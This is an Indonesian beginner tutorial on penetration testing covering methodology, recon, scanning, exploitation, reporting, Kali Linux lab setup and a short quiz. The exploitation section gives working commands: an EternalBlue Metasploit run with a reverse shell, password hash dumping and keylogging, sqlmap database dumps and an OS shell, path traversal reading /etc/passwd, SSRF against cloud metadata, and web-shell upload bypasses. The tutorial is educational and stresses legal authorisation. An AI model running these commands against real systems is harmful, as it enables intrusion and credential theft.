Penetration Testing untuk Pemula

📋 Daftar Isi

Pengenalan Penetration Testing
Methodology & Framework
Reconnaissance (Pengintaian)
Scanning & Enumeration
Exploitation (Eksploitasi)
Reporting & Documentation
Pengenalan Kali Linux
Quiz Pemahaman

1. Pengenalan Penetration Testing

Penetration Testing (atau disingkat pentest) adalah simulasi serangan siber yang dilakukan secara sistematis dan terstruktur terhadap sistem, jaringan, atau aplikasi — dengan izin resmi dari pemilik sistem. Tujuannya adalah mengidentifikasi kelemahan keamanan sebelum penyerang sungguhan menemukannya.

Penetration testing berbeda dari vulnerability scanning yang hanya mendeteksi kerentanan. Dalam pentest, tester benar-benar mencoba mengeksploitasi kerentanan untuk membuktikan dampak nyata yang bisa terjadi. Ini memberikan gambaran yang lebih realistis tentang risiko keamanan yang dihadapi organisasi.

Jenis-Jenis Penetration Testing

Jenis	Basis Pengetahuan	Simulasi	Kegunaan
Black Box	Tidak ada informasi — tester seperti penyerang asing	External attacker tanpa akses internal	Menguji pertahanan dari luar
White Box	Full akses — source code, arsitektur, kredensial	Insider threat atau code review	Analisis mendalam, coverage tinggi
Grey Box	Informasi parsial — beberapa akses terbatas	Authenticated user atau karyawan	Simulasi realistis, efisien

Cakupan Penetration Testing

Cakupan	Target	Contoh Tools
Network Pentest	Infrastruktur jaringan, server, firewall	Nmap, Metasploit, Nessus
Web Application Pentest	Aplikasi web, API, backend	Burp Suite, OWASP ZAP, sqlmap
Mobile App Pentest	Aplikasi Android/iOS	APKTool, Frida, MobSF
Social Engineering	Manusia — phishing, pretexting	GoPhish, SET Framework
Wireless Pentest	WiFi, Bluetooth, protokol nirkabel	Aircrack-ng, Kismet
Physical Pentest	Akses fisik ke gedung/ruang server	Lockpicks, RFID cloners

⚠️ Peringatan Hukum

Penetration testing HARUS selalu dilakukan dengan izin resmi tertulis dari pemilik sistem. Melakukan testing tanpa izin adalah tindak pidana yang dapat diancam hukuman berdasarkan UU ITE (Undang-Undang Informasi dan Transaksi Elektronik). Selalu pastikan ada scope of work dan rules of engagement yang disetujui kedua belah pihak sebelum memulai.

Diagram: Perbandingan Tipe Pentest

┌───────────────────────────────────────────────────────┐
│              PENETRATION TESTING TYPES                │
│                                                       │
│  BLACK BOX          GREY BOX          WHITE BOX       │
│  ┌──────────┐      ┌──────────┐      ┌──────────┐    │
│  │ ████████ │      │ ░░████░░ │      │ ░░░░░░░░ │    │
│  │ ████████ │      │ ░░████░░ │      │ ░░░░░░░░ │    │
│  │ ████████ │      │ ░░████░░ │      │ ░░░░░░░░ │    │
│  │ ████████ │      │ ░░████░░ │      │ ░░░░░░░░ │    │
│  └──────────┘      └──────────┘      └──────────┘    │
│  Tidak tahu        Tahu sebagian     Tahu semuanya   │
│  apa-apa           sistem            (code, infra)   │
│                                                       │
│  ████ = Pengetahuan tester                            │
│  ░░░░ = Area yang tidak diketahui                     │
└───────────────────────────────────────────────────────┘

2. Methodology & Framework

Penetration testing yang profesional selalu mengikuti methodology yang terstruktur dan terdokumentasi. Ini memastikan testing dilakukan secara menyeluruh, konsisten, dan hasilnya dapat dipertanggungjawabkan. Beberapa framework populer yang digunakan di industri:

PTES (Penetration Testing Execution Standard)

Fase	Aktivitas	Durasi Khas
1. Pre-engagement	Scope, rules of engagement, kontrak, legal	1-2 minggu
2. Intelligence Gathering	OSINT, footprinting, informasi publik	1-3 hari
3. Threat Modeling	Identifikasi aset kritis dan vektor serangan	1 hari
4. Vulnerability Analysis	Scanning dan identifikasi kelemahan	2-3 hari
5. Exploitation	Mencoba mengeksploitasi kelemahan yang ditemukan	3-5 hari
6. Post-Exploitation	Privilege escalation, lateral movement, data exfil	2-3 hari
7. Reporting	Dokumentasi temuan, rekomendasi, executive summary	3-5 hari

OWASP Testing Guide

Untuk web application pentest, OWASP Testing Guide adalah referensi utama. Panduan ini mencakup:

Text — OWASP Testing Categories

OWASP Web Testing Guide v4.2 — Fase Testing:

1. Information Gathering
   ├── Review webserver metafiles (robots.txt, sitemap.xml)
   ├── Fingerprint web server (Nmap, WhatWeb)
   ├── Enumerate applications on webserver
   └── Review webpage content and comments

2. Configuration & Deployment Management
   ├── Test network infrastructure configuration
   ├── Test application platform configuration
   └── Test file extensions handling

3. Identity Management
   ├── Test role definitions
   ├── Test user registration process
   └── Test account provisioning process

4. Authentication Testing
   ├── Test credentials transport (HTTPS)
   ├── Test default credentials
   ├── Test brute force protection
   └── Test browser cache management

5. Authorization Testing
   ├── Test directory traversal
   ├── Test privilege escalation
   └── Test insecure direct object references (IDOR)

6. Session Management Testing
   ├── Test session token strength
   ├── Test cookie attributes
   └── Test session fixation

7. Input Validation Testing
   ├── Test Reflected XSS / Stored XSS / DOM XSS
   ├── Test SQL injection
   ├── Test HTTP verb tampering
   └── Test HTTP parameter pollution

Rules of Engagement (RoE)

Text — Contoh Rules of Engagement

RULES OF ENGAGEMENT — Penetration Test

Proyek       : PT. Contoh Corp — Web Application Security Assessment
Tanggal      : 1-15 Juli 2026
Tester       : Tim Keamanan BeebaneLabs
Kontak Darurat: security@contoh.com | +62-xxx-xxx

=== SCOPE ===
Target yang DIIZINKAN untuk di-test:
  ✅ https://app.contoh.com
  ✅ https://api.contoh.com
  ✅ 192.168.1.0/24 (network range)

Target yang TIDAK diizinkan:
  ❌ https://payment.contoh.com (sistem pembayaran — out of scope)
  ❌ Production database — read-only akses
  ❌ Denial of Service (DoS) attack

=== RULES ===
1. Testing hanya dilakukan pada jam: 22:00 - 06:00 WIB (off-hours)
2. Jika menemukan data sensitif (PII), hentikan dan laporkan segera
3. Jika menemukan backdoor yang sudah ada, laporkan IMMEDIATELY
4. Semua temuan harus didokumentasikan dengan screenshot/video
5. Akses yang didapat harus dihapus setelah testing selesai
6. Laporan final diserahkan dalam 5 hari kerja setelah testing
7. Komunikasi darurat: jika sistem down, hubungi NOC segera

=== TANDA TANGAN ===
Client Representative: _______________
Penetration Tester   : _______________

3. Reconnaissance (Pengintaian)

Reconnaissance atau pengintaian adalah fase pertama dan paling krusial dalam penetration testing. Di fase ini, tester mengumpulkan sebanyak mungkin informasi tentang target — tanpa menyentuh sistem target secara langsung (passive) atau dengan interaksi minimal (active). Semakin banyak informasi yang dikumpulkan, semakin besar peluang keberhasilan exploit.

Passive Reconnaissance

Pengumpulan informasi tanpa berinteraksi langsung dengan target:

Bash — Passive Reconnaissance Tools

# =============================================
# PASSIVE RECONNAISSANCE — Tidak menyentuh target
# =============================================

# 1. WHOIS Lookup — Informasi registrasi domain
whois contoh.com
# Hasil: registrar, nama pemilik, tanggal expired, nameserver

# 2. DNS Enumeration
# Menggunakan dig untuk mencari record DNS
dig contoh.com ANY          # Semua record
dig contoh.com A            # IPv4 address
dig contoh.com AAAA         # IPv6 address
dig contoh.com MX           # Mail server
dig contoh.com NS           # Name server
dig contoh.com TXT          # TXT record (SPF, DKIM, dll)
dig contoh.com SOA          # Start of Authority

# 3. Subdomain Discovery (OSINT)
# Mencari subdomain dari berbagai sumber publik
subfinder -d contoh.com     # Passive subdomain enumeration
amass enum -passive -d contoh.com  # OWASP Amass

# 4. Google Dorking — Pencarian Google yang cerdas
# site:contoh.com filetype:pdf       → Cari PDF di domain
# site:contoh.com inurl:admin        → Cari halaman admin
# site:contoh.com intitle:"index of" → Cari directory listing
# site:contoh.com ext:sql|ext:log    → Cari file SQL/Log

# 5. Wayback Machine — Cek arsip web
# https://web.archive.org/web/*/contoh.com
# Gunakan tool waybackurls:
echo "contoh.com" | waybackurls | sort -u

# 6. Shodan — Search engine untuk perangkat internet
# https://www.shodan.io/search?query=hostname:contoh.com
# Hasil: port terbuka, banner, OS, CVE

# 7. GitHub Dorking — Cari kebocoran di source code
# "contoh.com" password
# "contoh.com" api_key
# "contoh.com" secret_token

Active Reconnaissance

Bash — Active Reconnaissance

# =============================================
# ACTIVE RECONNAISSANCE — Berinteraksi dengan target
# =============================================

# 1. Nmap — Port Scanning & Service Detection
# Basic scan — scan 1000 port paling umum
nmap -sV -sC -O target.com

# Detail scan — semua port + versi service
nmap -sV -sC -O -p- target.com -oA full_scan

# Stealth scan — TCP SYN scan (lebih sulit dideteksi)
nmap -sS -T3 target.com

# Script scan — gunakan NSE scripts
nmap --script vuln target.com

# 2. Web Technology Fingerprinting
whatweb target.com               # Deteksi CMS, framework, library
wappalyzer (browser extension)    # Deteksi teknologi web

# 3. Directory & File Bruteforce
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
dirsearch -u https://target.com -e php,asp,aspx,jsp

# 4. Subdomain Bruteforce (Active)
gobuster dns -d target.com -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# 5. WAF Detection
wafw00f https://target.com

# 6. SSL/TLS Analysis
sslscan target.com
testssl.sh target.com

💡 Tips Reconnaissance

Selalu mulai dengan passive recon — lebih aman dan tidak terdeteksi
Dokumentasikan SEMUA informasi yang ditemukan — bahkan yang tampaknya tidak penting
Gunakan multiple tools untuk cross-reference hasil
Simpan semua output ke file: nmap -oA hasil_scan target
Buat mind map atau diagram untuk memvisualisasikan attack surface

4. Scanning & Enumeration

Setelah fase reconnaissance, tahap selanjutnya adalah scanning dan enumeration — di mana kita secara aktif memindai target untuk menemukan port terbuka, service yang berjalan, versi software, dan kerentanan yang diketahui. Fase ini membangun fondasi untuk exploitation.

Network Scanning dengan Nmap

Bash — Nmap Advanced Scanning

# =============================================
# NMAP ADVANCED SCANNING TECHNIQUES
# =============================================

# 1. Service Version Detection + OS Detection + Default Scripts
nmap -sV -sC -O -T4 192.168.1.0/24 -oA network_scan

# Output contoh:
# PORT     STATE  SERVICE    VERSION
# 22/tcp   open   ssh        OpenSSH 8.9p1
# 80/tcp   open   http       Apache/2.4.52
# 443/tcp  open   https      nginx/1.18.0
# 3306/tcp open   mysql      MySQL 8.0.30
# OS: Linux 5.15 (Ubuntu 22.04)

# 2. Vulnerability Scanning dengan NSE Scripts
nmap --script vuln 192.168.1.10
# Scripts: smb-vuln-ms17-010, http-shellshock, ssl-heartbleed

# 3. UDP Scanning (sering diabaikan!)
nmap -sU --top-ports 50 192.168.1.10
# Menemukan service UDP: DNS, SNMP, NTP

# 4. Scan untuk web application directories
nmap --script http-enum 192.168.1.10

# 5. SMB Enumeration (Windows targets)
nmap --script smb-enum-shares,smb-enum-users 192.168.1.20

# 6. Nikto — Web Server Vulnerability Scanner
nikto -h https://target.com -output nikto_report.html
# Mengecek: misconfigurations, outdated software, dangerous files

# 7. Nuclei — Template-based vulnerability scanner
nuclei -u https://target.com -t cves/
nuclei -u https://target.com -t vulnerabilities/
nuclei -l urls.txt -t misconfiguration/ -o results.txt

Web Application Scanning

Text — Web Application Scanning Workflow

Web Application Scanning Workflow:

Step 1: Spider/Crawl aplikasi
  └── Burp Suite Spider / OWASP ZAP Spider
      └── Hasil: daftar semua URL, parameter, form

Step 2: Passive Scan
  └── Intercept semua traffic dan analisis tanpa mengubah request
      └── Hasil: insecure headers, cookie tanpa flags, info leakage

Step 3: Active Scan
  └── Kirim payload test ke setiap parameter dan endpoint
      └── Hasil: XSS, SQLi, CSRF, path traversal, dll.

Step 4: API Testing
  └── Test semua endpoint API secara manual
      └── Tools: Postman, Burp Suite
      └── Cek: authentication, authorization, input validation

Step 5: Authentication Testing
  └── Test brute force, default creds, password policy
  └── Test session management (timeout, fixation, hijacking)

Step 6: Manual Testing
  └── Business logic flaws yang tidak bisa dideteksi scanner
  └── Race conditions, access control bypass
  └── Multi-step process manipulation

5. Exploitation (Eksploitasi)

Fase exploitation adalah inti dari penetration testing — di mana tester benar-benar memanfaatkan kerentanan yang ditemukan untuk mendapatkan akses ke sistem. Ini membuktikan bahwa kerentanan tersebut memiliki dampak nyata dan bukan sekadar teori.

Metasploit Framework

Bash — Metasploit Basics

# =============================================
# METASPLOIT FRAMEWORK — Exploitation Toolkit
# =============================================

# Memulai Metasploit
msfconsole

# Cari exploit berdasarkan nama/CVE
msf6 > search eternalblue
msf6 > search cve:2021-44228    # Log4Shell

# Gunakan exploit EternalBlue (MS17-010)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.20
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.5
msf6 > set LPORT 4444
msf6 > show options   # Verifikasi konfigurasi
msf6 > exploit        # Jalankan exploit

# Setelah mendapat Meterpreter session:
meterpreter > sysinfo              # Info sistem
meterpreter > getuid               # Current user
meterpreter > hashdump             # Dump password hashes
meterpreter > shell                # Drop ke system shell
meterpreter > screenshot           # Screenshot desktop
meterpreter > keyscan_start        # Mulai keylogger
meterpreter > migrate 1234         # Pindah ke process lain

# Post-exploitation modules
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/multi/manage/shell_to_meterpreter

Manual Web Exploitation

Bash — Web Exploitation Examples

# =============================================
# WEB APPLICATION EXPLOITATION
# =============================================

# 1. SQL Injection dengan sqlmap
# Automated SQL injection detection & exploitation
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D database_name --tables
sqlmap -u "https://target.com/page?id=1" -D db -T users --dump

# Dengan POST request
sqlmap -u "https://target.com/login" --data="user=admin&pass=test" -p user

# Dengan cookie autentikasi
sqlmap -u "https://target.com/admin?id=1" --cookie="session=abc123"

# OS Shell via SQL injection
sqlmap -u "https://target.com/page?id=1" --os-shell

# 2. Directory Traversal
# Membaca file di luar webroot
curl "https://target.com/download?file=../../../etc/passwd"
curl "https://target.com/download?file=....//....//....//etc/passwd"

# 3. SSRF (Server-Side Request Forgery)
# Mengakses service internal melalui server web
curl "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
# Ini bisa mengakses AWS metadata!

# 4. File Upload Bypass
# Bypass filter untuk upload shell web
# Mengubah ekstensi: shell.php.jpg, shell.php%00.jpg
# Mengubah MIME type: Content-Type: image/jpeg
# Double extension: shell.php.jpg
# Null byte: shell.php%00.png

Diagram: Alur Exploitation

┌───────────────────────────────────────────────────────┐
│              EXPLOITATION WORKFLOW                     │
│                                                       │
│  ┌───────────────┐                                    │
│  │ Vulnerability │                                    │
│  │   Discovered  │                                    │
│  └───────┬───────┘                                    │
│          ▼                                            │
│  ┌───────────────┐     ┌──────────────┐              │
│  │ Research CVE  │────▶│ Find/Write   │              │
│  │ & Exploit DB  │     │   Exploit    │              │
│  └───────────────┘     └──────┬───────┘              │
│                               ▼                       │
│                       ┌──────────────┐                │
│                       │   Testing    │                │
│                       │  in Lab     │                │
│                       └──────┬───────┘                │
│                              ▼                        │
│                       ┌──────────────┐                │
│                       │   Execute    │                │
│                       │   Exploit   │                │
│                       └──────┬───────┘                │
│                              ▼                        │
│              ┌───────────────┴──────────────┐         │
│              ▼                              ▼         │
│     ┌──────────────┐              ┌──────────────┐    │
│     │  Success!    │              │   Failed     │    │
│     │  Access!     │              │  Try another │    │
│     └──────────────┘              └──────────────┘    │
└───────────────────────────────────────────────────────┘

6. Reporting & Documentation

Reporting adalah fase paling penting — bahkan lebih penting dari exploitation itu sendiri. Laporan yang baik mengubah temuan teknis menjadi aksi perbaikan yang bisa dipahami oleh manajemen dan diterapkan oleh tim IT. Tanpa laporan yang baik, seluruh usaha penetration testing menjadi sia-sia.

Struktur Laporan Pentest

Text — Contoh Struktur Laporan Pentest

LAPORAN PENETRATION TESTING
============================

1. EXECUTIVE SUMMARY (1-2 halaman)
   - Tujuan dan cakupan testing
   - Ringkasan temuan kritis (tanpa jargon teknis)
   - Risk rating keseluruhan
   - Rekomendasi prioritas untuk manajemen

2. SCOPE & METHODOLOGY
   - Target yang di-test
   - Tools yang digunakan
   - Methodology (PTES/OWASP)
   - Tanggal dan durasi testing

3. FINDINGS DETAIL

   Finding #1: SQL Injection pada Login Form
   ├── Severity    : CRITICAL (CVSS 9.8)
   ├── Location    : https://app.contoh.com/login
   ├── Description : Parameter 'username' vulnerable to SQL injection
   ├── Impact      : Full database access, data exfiltration
   ├── Evidence    : [Screenshot + Proof of Concept]
   ├── Remediation : Gunakan parameterized queries (prepared statements)
   └── References  : CWE-89, OWASP A03:2021

   Finding #2: Missing Rate Limiting
   ├── Severity    : HIGH (CVSS 7.5)
   ├── Location    : https://app.contoh.com/api/auth
   ├── Description : No rate limiting on authentication endpoint
   ├── Impact      : Brute force attack possible
   ├── Evidence    : [1000 requests tanpa block]
   ├── Remediation : Implement rate limiting (5 attempts/15 min)
   └── References  : CWE-307, OWASP A07:2021

4. RISK MATRIX
   ┌──────────────┬───────┬───────────────────────────┐
   │  Severity     │ Count │ Description               │
   ├──────────────┼───────┼───────────────────────────┤
   │  Critical     │   2   │ Immediate action required  │
   │  High         │   5   │ Action within 1 week       │
   │  Medium       │   8   │ Action within 1 month      │
   │  Low          │   12  │ Best practice improvements │
   │  Informational│   6   │ Observations               │
   └──────────────┴───────┴───────────────────────────┘

5. APPENDIX
   - Full Nmap scan output
   - Raw Burp Suite scan data
   - Tool version information
   - Credentials created during testing (for cleanup)

Severity Classification

Severity	CVSS Score	Response Time	Contoh
🔴 Critical	9.0 - 10.0	Immediate (24 jam)	RCE, SQL Injection, Auth Bypass
🟠 High	7.0 - 8.9	1 minggu	Stored XSS, Privilege Escalation
🟡 Medium	4.0 - 6.9	1 bulan	CSRF, Information Disclosure
🟢 Low	0.1 - 3.9	Quarterly	Missing headers, verbose errors
ℹ️ Info	0.0	Best practice	Outdated software version

7. Pengenalan Kali Linux

Kali Linux adalah distribusi Linux yang dirancang khusus untuk penetration testing, security research, dan digital forensics. Dikembangkan oleh Offensive Security, Kali Linux hadir dengan lebih dari 600 tools keamanan yang sudah terinstall dan dikonfigurasi. Ini adalah operating system yang paling banyak digunakan oleh ethical hacker dan security professional di seluruh dunia.

Setup Kali Linux

Bash — Kali Linux Setup

# =============================================
# KALI LINUX — Setup & Essential Commands
# =============================================

# Download Kali Linux dari: https://www.kali.org/get-kali/
# Opsi instalasi:
# 1. VM Image (VirtualBox/VMWare) — paling mudah untuk pemula
# 2. Bootable USB — untuk bare metal installation
# 3. WSL (Windows Subsystem for Linux) — untuk Windows
# 4. Kali NetHunter — untuk Android

# Update system setelah install
sudo apt update && sudo apt upgrade -y

# Install tools tambahan
sudo apt install -y kali-linux-large    # Collection populer
sudo apt install -y kali-tools-web      # Web app testing
sudo apt install -y kali-tools-network  # Network analysis
sudo apt install -y kali-tools-exploitation  # Exploitation tools

# Tools yang WAJIB dikuasai:
# ┌────────────────────┬───────────────────────────────────┐
# │  Tool              │  Fungsi                           │
# ├────────────────────┼───────────────────────────────────┤
# │  Nmap              │  Port scanning & enumeration      │
# │  Burp Suite        │  Web app testing proxy            │
# │  Metasploit        │  Exploitation framework           │
# │  sqlmap            │  Automated SQL injection          │
# │  John the Ripper   │  Password cracking                │
# │  Hashcat           │  GPU-accelerated hash cracking    │
# │  Aircrack-ng       │  Wireless network auditing        │
# │  Wireshark         │  Network packet analysis          │
# │  Gobuster          │  Directory/DNS brute-forcing      │
# │  Nikto             │  Web server scanner               │
# │  Hydra             │  Login brute-force                │
# │  WPScan            │  WordPress vulnerability scanner  │
# │  Recon-ng           │  Reconnaissance framework        │
# │  Maltego           │  OSINT & link analysis            │
# └────────────────────┴───────────────────────────────────┘

Lab Environment untuk Latihan

Text — Setting Up Pentest Lab

SETTING UP YOUR OWN PENTEST LAB

Tujuan: Berlatih penetration testing secara LEGAL di lingkungan sendiri

Required:
  - PC/Laptop: RAM minimal 8GB, 50GB free disk
  - VirtualBox atau VMWare Workstation (gratis)

VM yang harus diinstall:
  1. Kali Linux (attacker machine)
     └── https://www.kali.org/get-kali/
  
  2. Metasploitable 2/3 (vulnerable target)
     └── https://sourceforge.net/projects/metasploitable/
  
  3. DVWA — Damn Vulnerable Web Application
     └── https://github.com/digininja/DVWA
  
  4. OWASP WebGoat
     └── https://owasp.org/www-project-webgoat/
  
  5. VulnHub machines (various difficulty)
     └── https://www.vulnhub.com/

Network Setup:
  ┌──────────────┐      ┌──────────────┐
  │  Kali Linux  │◄────►│  Metasploit. │
  │  (Attacker)  │ Host │  (Target)    │
  │  192.168.1.5 │ Only │  192.168.1.10│
  └──────────────┘ Net  └──────────────┘

  - Gunakan "Host Only Network" agar terisolasi dari internet
  - JANGAN pernah targetkan VM ke internet!

Online Practice Platforms (LEGAL):
  - TryHackMe (tryhackme.com) — Pemula sampai menengah
  - HackTheBox (hackthebox.com) — Menengah sampai lanjut
  - PentesterLab (pentesterlab.com) — Web app focused
  - OverTheWire (overthewire.org) — Wargame challenges
  - PicoCTF (picoctf.org) — CTF untuk pemula

💡 Sertifikasi Penetration Testing

CEH (Certified Ethical Hacker) — Sertifikasi entry-level, diakui secara global
CompTIA PenTest+ — Sertifikasi intermediate untuk pentester
OSCP (Offensive Security Certified Professional) — Sangat prestisius, berbasis hands-on exam 24 jam
eJPT (eLearnSecurity Junior Penetration Tester) — Bagus untuk memulai
GPEN (GIAC Penetration Tester) — Advanced enterprise certification

8. Quiz: Uji Pemahamanmu!

Setelah membaca tutorial di atas, jawablah 5 pertanyaan berikut untuk menguji pemahamanmu tentang Penetration Testing:

Pertanyaan 1: Apa perbedaan utama antara penetration testing dan vulnerability scanning?

a) Tidak ada perbedaan, keduanya sama

b) Pentest mengeksploitasi kerentanan untuk membuktikan dampak, sedangkan vulnerability scanning hanya mendeteksi

c) Vulnerability scanning lebih berbahaya dari pentest

d) Pentest dilakukan tanpa izin, vulnerability scanning dengan izin

Pertanyaan 2: Tipe penetration testing apa yang tester tidak diberikan informasi apapun tentang target?

a) White Box

b) Grey Box

c) Black Box

d) Blue Box

Pertanyaan 3: Dalam fase mana tester mengumpulkan informasi tentang target tanpa berinteraksi langsung?

a) Exploitation

b) Scanning

c) Reporting

d) Passive Reconnaissance

Pertanyaan 4: Tool apa yang digunakan untuk automated SQL injection exploitation?

a) Nmap

b) sqlmap

c) Nikto

d) Hydra

Pertanyaan 5: Operating system apa yang paling banyak digunakan oleh penetration tester?

a) Windows 11

b) Ubuntu Desktop

c) Kali Linux

d) macOS